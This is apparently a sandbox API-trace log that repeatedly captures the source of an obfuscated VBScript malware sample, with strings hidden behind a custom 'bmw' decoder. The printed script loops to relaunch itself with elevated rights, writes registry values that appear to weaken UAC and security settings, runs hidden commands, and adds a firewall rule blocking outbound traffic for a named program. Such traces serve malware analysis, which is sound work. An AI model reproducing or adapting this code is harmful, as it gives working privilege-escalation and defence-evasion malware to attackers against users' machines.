CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.006] wcsncmp (_String1="le.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.006] wcsncmp (_String1="e.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.006] wcsncmp (_String1=".enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.006] wcsncmp (_String1="enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.006] wcsncmp (_String1="nabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 